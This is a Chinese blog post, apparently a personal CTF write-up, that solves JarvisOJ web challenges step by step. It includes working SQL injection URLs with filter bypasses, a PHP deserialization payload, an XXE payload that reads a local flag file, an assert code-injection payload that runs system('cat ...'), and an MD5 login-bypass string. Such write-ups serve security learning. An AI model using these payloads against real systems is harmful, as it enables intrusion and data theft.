<!DOCTYPE html>

<html lang="zh-CN">

<head>
    
    <title>JarvisOj - M1N&#39;s Blog</title>
    <meta charset="UTF-8">
    <meta name="keywords" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
    
    

    <link rel="shortcut icon" href="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/head.png" type="image/png" />
    <meta name="description" content="https:&#x2F;&#x2F;www.jarvisoj.com&#x2F;">
<meta property="og:type" content="article">
<meta property="og:title" content="JarvisOj">
<meta property="og:url" content="http://blog.m1n.me/2019/11/27/JarvisOj/index.html">
<meta property="og:site_name" content="M1N&#39;s Blog">
<meta property="og:description" content="https:&#x2F;&#x2F;www.jarvisoj.com&#x2F;">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2019-11-27T14:22:21.000Z">
<meta property="article:modified_time" content="2020-02-05T15:08:37.602Z">
<meta property="article:author" content="M1N">
<meta name="twitter:card" content="summary">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/npm/highlight.js@9.15.8/styles/atom-one-dark.css,npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css,gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css,npm/hexo-theme-nexmoe@latest/source/lib/mdui_043tiny/css/mdui.css,npm/hexo-theme-nexmoe@latest/source/lib/iconfont/iconfont.css?v=233" crossorigin>
    <link rel="stylesheet" href="/css/style.css?v=1641264017437">
     
    
    <link rel="stylesheet" href="/lib/iconfont/iconfont.css?v=1641264017437">
    
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="mdui-drawer-body-left">
    
    <div id="nexmoe-background">
        <div class="nexmoe-bg" style="background-image: url(https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/4.jpg)"></div>
        <div class="mdui-appbar mdui-shadow-0">
            <div class="mdui-toolbar">
                <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon mdui-ripple"><i class="mdui-icon nexmoefont icon-menu"></i></a>
                <div class="mdui-toolbar-spacer"></div>
                <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
                <a href="/" title="M1N" class="mdui-btn mdui-btn-icon"><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/head.png" alt="M1N"></a>
            </div>
        </div>
    </div>
    <div id="nexmoe-header">
        <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="M1N">
            <img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/head.png" alt="M1N" alt="M1N">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>8</div>
        <div><span>标签</span>0</div>
        <div><span>分类</span>4</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
    </div>
    <aside id="nexmoe-sidebar">
    
    <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
         
            <form id="search_form" action_e="https://cn.bing.com/search?q=site:m1n.me" onsubmit="return search();">
                <label><input id="search_value" name="q" type="search" placeholder="搜索"></label>
            </form>
         
    </div>
</div>
    
    <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://github.com/m1nme/" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(25, 23, 23);background-color: rgba(25, 23, 23, .15);">
            <i class="nexmoefont icon-github"></i>
        </a>
    </div>
</div>
    
    
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章分类</h3>
    <div class="nexmoe-widget">

      <ul class="category-list">

        


        

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Bypass/">Bypass</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/SQL-Injection/">SQL注入</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Writeup/">Writeup</a>
          <span class="category-list-count">4</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/文件上传/">文件上传</a>
          <span class="category-list-count">2</span>
        </li>

        
      </ul>

    </div>
  </div>


    
    
    
</aside>
    <div class="nexmoe-copyright">
        &copy; 2022 M1N
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://github.com/theme-nexmoe/hexo-theme-nexmoe" target="_blank">Nexmoe</a>
        
    </div>
</div><!-- .nexmoe-drawer -->
    </div>
    <div id="nexmoe-content">
        <div class="nexmoe-primary">
            <div class="nexmoe-post">

  <article>
      
          <div class="nexmoe-post-cover" style="padding-bottom: NaN%;"> 
              <img data-src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/6.jpg" data-sizes="auto" alt="JarvisOj" class="lazyload">
              <h1>JarvisOj</h1>
          </div>
      
      
      <div class="nexmoe-post-meta nexmoe-rainbow" style="margin:10px 0!important;">
    <a><i class="nexmoefont icon-calendar-fill"></i>2019年11月27日</a>
    <a><i class="nexmoefont icon-areachart"></i>2.1k 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 10 分钟</a>
</div>

      

      <p><a target="_blank" rel="noopener" href="https://www.jarvisoj.com/">https://www.jarvisoj.com/</a></p>
<span id="more"></span>

<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="LocalHost"><a href="#LocalHost" class="headerlink" title="LocalHost"></a>LocalHost</h2><p>抓包加一个“X-Forwarded-For: 127.0.0.1”完事</p>
<h2 id="PORT51"><a href="#PORT51" class="headerlink" title="PORT51"></a>PORT51</h2><p>刚开始以为改端口就完了，，后来发现是我太菜了，要改我们的访问端口<br><code>curl --loacl-port 51 http://web.jarvisoj.com:32770/</code>就拿到了flag，，学到了</p>
<h2 id="神盾局的秘密"><a href="#神盾局的秘密" class="headerlink" title="神盾局的秘密"></a>神盾局的秘密</h2><p>进去以后就是一张图片<br>先view-source一下看到了：<br><code>&lt;img src=&quot;showimg.php?img=c2hpZWxkLmpwZw==&quot; width=&quot;100%&quot;/&gt;</code><br>看到了一个showimg.php，看样子应该可以用img这个参数来读文件，先读一下showimg.php这个文件，没看到啥有用的东西，再看一下index.php看到了有一个反序列化的点，看样子是反序列化的题目，源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br>	<span class="hljs-keyword">require_once</span>(<span class="hljs-string">&#x27;shield.php&#x27;</span>);<br>	<span class="hljs-variable">$x</span> = <span class="hljs-keyword">new</span> Shield();<br>	<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;class&#x27;</span>]) &amp;&amp; <span class="hljs-variable">$g</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;class&#x27;</span>];<br>	<span class="hljs-keyword">if</span> (!<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$g</span>)) &#123;<br>		<span class="hljs-variable">$x</span> = unserialize(<span class="hljs-variable">$g</span>);<br>	&#125;<br>	<span class="hljs-keyword">echo</span> <span class="hljs-variable">$x</span>-&gt;readfile();<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>看到了shield.php，读一下看看：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>	<span class="hljs-comment">//flag is in pctf.php</span><br>	<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Shield</span> </span>&#123;<br>		<span class="hljs-keyword">public</span> <span class="hljs-variable">$file</span>;<br>		<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$filename</span> = <span class="hljs-string">&#x27;&#x27;</span></span>) </span>&#123;<br>			<span class="hljs-keyword">$this</span> -&gt; file = <span class="hljs-variable">$filename</span>;<br>		&#125;<br>		<br>		<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">readfile</span>(<span class="hljs-params"></span>) </span>&#123;<br>			<span class="hljs-keyword">if</span> (!<span class="hljs-keyword">empty</span>(<span class="hljs-keyword">$this</span>-&gt;file) &amp;&amp; stripos(<span class="hljs-keyword">$this</span>-&gt;file,<span class="hljs-string">&#x27;..&#x27;</span>)===<span class="hljs-literal">FALSE</span>  <br>			&amp;&amp; stripos(<span class="hljs-keyword">$this</span>-&gt;file,<span class="hljs-string">&#x27;/&#x27;</span>)===<span class="hljs-literal">FALSE</span> &amp;&amp; stripos(<span class="hljs-keyword">$this</span>-&gt;file,<span class="hljs-string">&#x27;\\&#x27;</span>)==<span class="hljs-literal">FALSE</span>) &#123;<br>				<span class="hljs-keyword">return</span> @file_get_contents(<span class="hljs-keyword">$this</span>-&gt;file);<br>			&#125;<br>		&#125;<br>	&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Shield</span></span>&#123;<br>	<span class="hljs-keyword">public</span> <span class="hljs-variable">$file</span>=<span class="hljs-string">&#x27;pctf.php&#x27;</span>;<br>&#125;<br><span class="hljs-variable">$c</span> = <span class="hljs-keyword">new</span> Shield();<br><span class="hljs-keyword">echo</span> serialize(<span class="hljs-variable">$c</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>“view-source:<a target="_blank" rel="noopener" href="http://web.jarvisoj.com:32768/index.php?class=O:6:%22Shield%22:1:%7Bs:4:%22file%22;s:8:%22pctf.php%22;%7D&quot;">http://web.jarvisoj.com:32768/index.php?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}&quot;</a><br>就拿到了flag</p>
<h2 id="Login"><a href="#Login" class="headerlink" title="Login"></a>Login</h2><p>提示说需要密码才能拿到flag，，但是测试了一下发现当输入双引号的时候会报sql错误，应该是存在sql注入，但是测试了好久没发现有什么用，，看了一眼wp要先抓包，，在head里面有hint。。。<br>‘Hint: “select * from <code>admin</code> where password=’”.md5($pass,true).”‘“‘<br>然后想到应该是md5的安全问题，0e开头的问题应该是不存在，参考了一下<a target="_blank" rel="noopener" href="https://www.cnblogs.com/piaomiaohongchen/p/10659359.html">https://www.cnblogs.com/piaomiaohongchen/p/10659359.html</a><br>试了一下文中给出的密码ffifdyop就拿到了flag</p>
<h2 id="admin"><a href="#admin" class="headerlink" title="admin"></a>admin</h2><p>打开网页只有一个hello world，查看网页源代码没看到啥有用的东西，于是就看看有没有robots.txt，看到了admin_s3cr3t.php，访问拿到假的flag，想了想应该是跟cookie有关，于是就抓包看看，应该是在cookie有判断是不是admin，但是我抓到的包没有cookie，反而是看到一个类似于base64的一串编码，就一直在搞这个也没搞出个啥，后来看了一下wp别人就有抓到admin=0.。。。我就重新刷新重新抓了一下包才看到了这玩意，，改成1就拿到了flag，看来应该是还没有设置cookie就被我抓包了，，，害，下次注意</p>
<h2 id="IN-A-mess"><a href="#IN-A-mess" class="headerlink" title="IN A mess"></a>IN A mess</h2><p>1.查看网页源代码让我访问index.phps，看到源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br>error_reporting(<span class="hljs-number">0</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;!--index.phps--&gt;&quot;</span>;<br><br><span class="hljs-keyword">if</span>(!<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;id&#x27;</span>])<br>&#123;<br>	header(<span class="hljs-string">&#x27;Location: index.php?id=1&#x27;</span>);<br>	<span class="hljs-keyword">exit</span>();<br>&#125;<br><span class="hljs-variable">$id</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;id&#x27;</span>];<br><span class="hljs-variable">$a</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;a&#x27;</span>];<br><span class="hljs-variable">$b</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;b&#x27;</span>];<br><span class="hljs-keyword">if</span>(stripos(<span class="hljs-variable">$a</span>,<span class="hljs-string">&#x27;.&#x27;</span>))<br>&#123;<br>	<span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;Hahahahahaha&#x27;</span>;<br>	<span class="hljs-keyword">return</span> ;<br>&#125;<br><span class="hljs-variable">$data</span> = @file_get_contents(<span class="hljs-variable">$a</span>,<span class="hljs-string">&#x27;r&#x27;</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$data</span>==<span class="hljs-string">&quot;1112 is a nice lab!&quot;</span> <span class="hljs-keyword">and</span> <span class="hljs-variable">$id</span>==<span class="hljs-number">0</span> <span class="hljs-keyword">and</span> strlen(<span class="hljs-variable">$b</span>)&gt;<span class="hljs-number">5</span> <span class="hljs-keyword">and</span> eregi(<span class="hljs-string">&quot;111&quot;</span>.substr(<span class="hljs-variable">$b</span>,<span class="hljs-number">0</span>,<span class="hljs-number">1</span>),<span class="hljs-string">&quot;1114&quot;</span>) <span class="hljs-keyword">and</span> substr(<span class="hljs-variable">$b</span>,<span class="hljs-number">0</span>,<span class="hljs-number">1</span>)!=<span class="hljs-number">4</span>)<br>&#123;<br>	<span class="hljs-keyword">require</span>(<span class="hljs-string">&quot;flag.txt&quot;</span>);<br>&#125;<br><span class="hljs-keyword">else</span><br>&#123;<br>	<span class="hljs-keyword">print</span> <span class="hljs-string">&quot;work harder!harder!harder!&quot;</span>;<br>&#125;<br><br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>可以看到主要就是那一层if</p>
<ol>
<li>$data用php://input传进去</li>
<li>id=0</li>
<li>b长度要大于5但是要满足第二、三层要长度为0，这时候就要让b=%0011111，strlen不会被截断，substr会被截断</li>
<li>然后让我们访问<a target="_blank" rel="noopener" href="http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1%EF%BC%8C%E5%8F%88%E7%9C%8B%E5%88%B0%E4%BA%86id=1%EF%BC%8C%E6%9C%89%E5%8F%AF%E8%83%BD%E6%98%AF%E6%B3%A8%E5%85%A5">http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1，又看到了id=1，有可能是注入</a></li>
<li>用单引号测试发现直接返回了sql语句，那看来应该就是sql注入了</li>
<li>测试发现过滤了空格这个可以用注释符/**/绕过，但是发现直接用会被过滤，试着往里面加点东西就好了</li>
<li>用<code>http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1/*1*/order/*1*/by/*1*/3#</code>测试得到字段数为3</li>
<li>用<code>http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,database()/*1*/#</code>拿到数据库名是test</li>
<li>用<code>http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,table_name/*1*/frofromm/*1*/information_schema.tables/*1*/where/*1*/table_schema=0x74657374#</code>拿到表名content</li>
<li>用<code>http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,group_concat(column_name)/*1*/frofromm/*1*/information_schema.columns/*1*/where/*1*/table_name=0x636f6e74656e74#</code>得到字段名是id,context,title</li>
<li>用<code>http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,group_concat(context)/*1*/frofromm/*1*/content#</code>拿到flag</li>
</ol>
<h2 id="api调用"><a href="#api调用" class="headerlink" title="api调用"></a>api调用</h2><p>由于默认传输是json格式，先抓包把格式改成xml，然后传payload<code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;  &lt;!DOCTYPE foo [  &lt;!ENTITY myentity SYSTEM &quot;file:///home/ctf/flag.txt&quot; &gt;]&gt;  &lt;abc&gt;&amp;myentity;&lt;/abc&gt;</code>就拿到了flag</p>
<h2 id="WEB？"><a href="#WEB？" class="headerlink" title="WEB？"></a>WEB？</h2><p>一开始还看不懂题目要干嘛，然后查看源代码看到一堆Js，然后用谷歌插件美化一下（安利一下JavaScript and CSS Code Beautifier），方便看代码。然后发现有两万行的代码。。。。看WP知道了用password关键词来开始审计。大概就是矩阵A*B=C,已知B，C求A。（线代知识早就忘得差不多了）</p>
<h2 id="babyphp"><a href="#babyphp" class="headerlink" title="babyphp"></a>babyphp</h2><p>攻防世界原题，先是githack拿到源码，然后assert任意代码执行拿到flag，用’)闭合然后任意执行代码<br>payload：<code>?page=2&#39;) or system(&quot;cat templates/flag.php&quot;);//</code></p>
<h2 id="inject"><a href="#inject" class="headerlink" title="inject"></a>inject</h2><p>提示说先拿到源码再说，看了WP知道要试常见的备份文件名，常见的备份文件临时文件名，比如.bak、.swp、.save、<del>等，然后这一题是在index.php</del>…..拿到源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">require</span>(<span class="hljs-string">&quot;config.php&quot;</span>);<br><span class="hljs-variable">$table</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;table&#x27;</span>]?<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;table&#x27;</span>]:<span class="hljs-string">&quot;test&quot;</span>;<br><span class="hljs-variable">$table</span> = Filter(<span class="hljs-variable">$table</span>);<br>mysqli_query(<span class="hljs-variable">$mysqli</span>,<span class="hljs-string">&quot;desc `secret_<span class="hljs-subst">&#123;$table&#125;</span>`&quot;</span>) <span class="hljs-keyword">or</span> Hacker();<br><span class="hljs-variable">$sql</span> = <span class="hljs-string">&quot;select &#x27;flag&#123;xxx&#125;&#x27; from secret_<span class="hljs-subst">&#123;$table&#125;</span>&quot;</span>;<br><span class="hljs-variable">$ret</span> = sql_query(<span class="hljs-variable">$sql</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$ret</span>[<span class="hljs-number">0</span>];<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>应该是sql注入的题目，先是要成功执行desc <code>secret_&#123;$table&#125;</code>，然后利用下面的sql语句拿到flag。desc table_name需要表存在，这样就限制了注入，因此应该就是要在这里下功夫。<br>因为desc <code>test</code> <code>aaa</code>,只要第一个表存在就会执行，但是如果是单引号就不会执行，这一要考核的应该就是这个点。然后就可以构造payload：”?table=test<code> </code>union select database() limit 1,1”拿到数据库名61d300，注意要加limit，不然直会返回D。然后构造payload：“?table=test<code> </code>union select table_name from information_schema.tables where table_schema=0x363164333030 limit 1,1”，拿到表名secret_flag，注意用十六进制过waf。同样办法拿到列名flagUwillNeverKnow，然后拿到flag：flag{luckyGame~}</p>
<h2 id="phpinfo"><a href="#phpinfo" class="headerlink" title="phpinfo"></a>phpinfo</h2><p>session的序列化方法不同导致的漏洞，还有就是如何往session里加入payload</p>
<h2 id="RE？"><a href="#RE？" class="headerlink" title="RE？"></a>RE？</h2><p>下载了个udf.so文件，不知道这是啥就上网搜了一下，<a target="_blank" rel="noopener" href="https://www.cnblogs.com/sijidou/p/10522972.html">https://www.cnblogs.com/sijidou/p/10522972.html</a></p>
<h2 id="flag在管理员手里"><a href="#flag在管理员手里" class="headerlink" title="flag在管理员手里"></a>flag在管理员手里</h2><p>先抓个包，看到cookie里有一个admin=0，改成1不行，还有一个字符串，url解码以后发现是s:5:”guest”;试一下改成admin很显然也是不行的，还有就是一个哈希值，估计直接爆破也是不行的，到这里就断了思路。然后看WP说找源码，一样的index.php~拿到一个实质为.swp的vim异常退出文件，然后就分析一下源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br>	<span class="hljs-variable">$auth</span> = <span class="hljs-literal">false</span>;<br>	<span class="hljs-variable">$role</span> = <span class="hljs-string">&quot;guest&quot;</span>;<br>	<span class="hljs-variable">$salt</span> = <br>	<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&quot;role&quot;</span>])) &#123;<br>	    <span class="hljs-variable">$role</span> = unserialize(<span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&quot;role&quot;</span>]);<br>	    <span class="hljs-variable">$hsh</span> = <span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&quot;hsh&quot;</span>];<br>	    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$role</span>===<span class="hljs-string">&quot;admin&quot;</span> &amp;&amp; <span class="hljs-variable">$hsh</span> === md5(<span class="hljs-variable">$salt</span>.strrev(<span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&quot;role&quot;</span>]))) &#123;<br>	        <span class="hljs-variable">$auth</span> = <span class="hljs-literal">true</span>;<br>	    &#125; <span class="hljs-keyword">else</span> &#123;<br>	        <span class="hljs-variable">$auth</span> = <span class="hljs-literal">false</span>;<br>	    &#125;<br>	&#125; <span class="hljs-keyword">else</span> &#123;<br>	    <span class="hljs-variable">$s</span> = serialize(<span class="hljs-variable">$role</span>);<br>	    setcookie(<span class="hljs-string">&#x27;role&#x27;</span>,<span class="hljs-variable">$s</span>);<br>	    <span class="hljs-variable">$hsh</span> = md5(<span class="hljs-variable">$salt</span>.strrev(<span class="hljs-variable">$s</span>));<br>	    setcookie(<span class="hljs-string">&#x27;hsh&#x27;</span>,<span class="hljs-variable">$hsh</span>);<br>	&#125;<br>	<span class="hljs-keyword">if</span> (<span class="hljs-variable">$auth</span>) &#123;<br>	    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h3&gt;Welcome Admin. Your flag is </span><br><span class="hljs-string">	&#125; else &#123;</span><br><span class="hljs-string">	    echo &quot;</span>&lt;h3&gt;Only Admin can see the flag!!&lt;/h3&gt;<span class="hljs-string">&quot;;</span><br><span class="hljs-string">	&#125;</span><br><span class="hljs-string">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>可以看到哈希值是md5(salt+反向“admin”)；应该是哈希的某种攻击方法。了解到应该可以进行哈希长度拓展攻击。<br>（参考<a target="_blank" rel="noopener" href="https://www.cnblogs.com/pcat/p/5478509.html%EF%BC%89">https://www.cnblogs.com/pcat/p/5478509.html）</a><br>PCTF{H45h_ext3ndeR_i5_easy_to_us3}</p>
<h2 id="Chopper"><a href="#Chopper" class="headerlink" title="Chopper"></a>Chopper</h2><p>进入管理员登陆界面，查看源代码发现“admin ip is 202.5.19.128”；</p>
<h2 id="Simple-Injection"><a href="#Simple-Injection" class="headerlink" title="Simple Injection"></a>Simple Injection</h2><p>发现当输入的账号是admin的时候回显是密码错误，输入其他账户的时候回显是密码错误。当账户名用admin’ #发现可以但是用admin’ and 1=1 #时被过滤了，再试一下<code>admin&#39;/**/and/**/</code>发现没有被过滤，也就是这里存在注入点，根据回显可以尝试bool盲注或者时间盲注。<br>不过看了WP才发现还有一种更简单的方法<br>直接用payload<code>username=miracle778&#39;/**/union(select(md5(&#39;123&#39;)))#&amp;password=123</code>就能拿到flag</p>

  </article>

  
      
    <div class="nexmoe-post-copyright">
        <strong>本文作者：</strong>M1N<br>
        <strong>本文链接：</strong><a href="http://blog.m1n.me/2019/11/27/JarvisOj/" title="http:&#x2F;&#x2F;blog.m1n.me&#x2F;2019&#x2F;11&#x2F;27&#x2F;JarvisOj&#x2F;" target="_blank" rel="noopener">http:&#x2F;&#x2F;blog.m1n.me&#x2F;2019&#x2F;11&#x2F;27&#x2F;JarvisOj&#x2F;</a><br>
        
            <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可
        
    </div>


  
  
  <div class="nexmoe-post-meta nexmoe-rainbow">
    
        <a class="nexmoefont icon-appstore-fill -link" href="/categories/Writeup/">Writeup</a>
    
    
</div>

  
      <div class="nexmoe-post-footer">
          <section class="nexmoe-comment">
    <div class="valine"></div>
<script src='https://cdn.jsdelivr.net/npm/valine'></script>
<script>
    // 使用方法 https://valine.js.org/quickstart.html
    new Valine({
        el: '.valine',
        appId: 'UzwkiNx4XBeK7X1PnP8hQnJd-gzGzoHsz',
        appKey: 'mDiKv9RewzE8lKmFySr1XEkH'
    })
</script>
</section>
      </div>
  
</div>
            <div class="nexmoe-post-right">
              <div class="nexmoe-fixed">
                  <div class="nexmoe-tool"> 
                    
                      
                        
                          
                          
                              <button class="mdui-fab catalog" style="overflow:unset;">
                                  <i class="nexmoefont icon-i-catalog"></i>
                                  <div class="nexmoe-toc">
                                      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-number">1.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#LocalHost"><span class="toc-number">1.1.</span> <span class="toc-text">LocalHost</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PORT51"><span class="toc-number">1.2.</span> <span class="toc-text">PORT51</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A5%9E%E7%9B%BE%E5%B1%80%E7%9A%84%E7%A7%98%E5%AF%86"><span class="toc-number">1.3.</span> <span class="toc-text">神盾局的秘密</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Login"><span class="toc-number">1.4.</span> <span class="toc-text">Login</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#admin"><span class="toc-number">1.5.</span> <span class="toc-text">admin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IN-A-mess"><span class="toc-number">1.6.</span> <span class="toc-text">IN A mess</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#api%E8%B0%83%E7%94%A8"><span class="toc-number">1.7.</span> <span class="toc-text">api调用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB%EF%BC%9F"><span class="toc-number">1.8.</span> <span class="toc-text">WEB？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#babyphp"><span class="toc-number">1.9.</span> <span class="toc-text">babyphp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#inject"><span class="toc-number">1.10.</span> <span class="toc-text">inject</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#phpinfo"><span class="toc-number">1.11.</span> <span class="toc-text">phpinfo</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RE%EF%BC%9F"><span class="toc-number">1.12.</span> <span class="toc-text">RE？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag%E5%9C%A8%E7%AE%A1%E7%90%86%E5%91%98%E6%89%8B%E9%87%8C"><span class="toc-number">1.13.</span> <span class="toc-text">flag在管理员手里</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Chopper"><span class="toc-number">1.14.</span> <span class="toc-text">Chopper</span></a></li><li class="toc-item 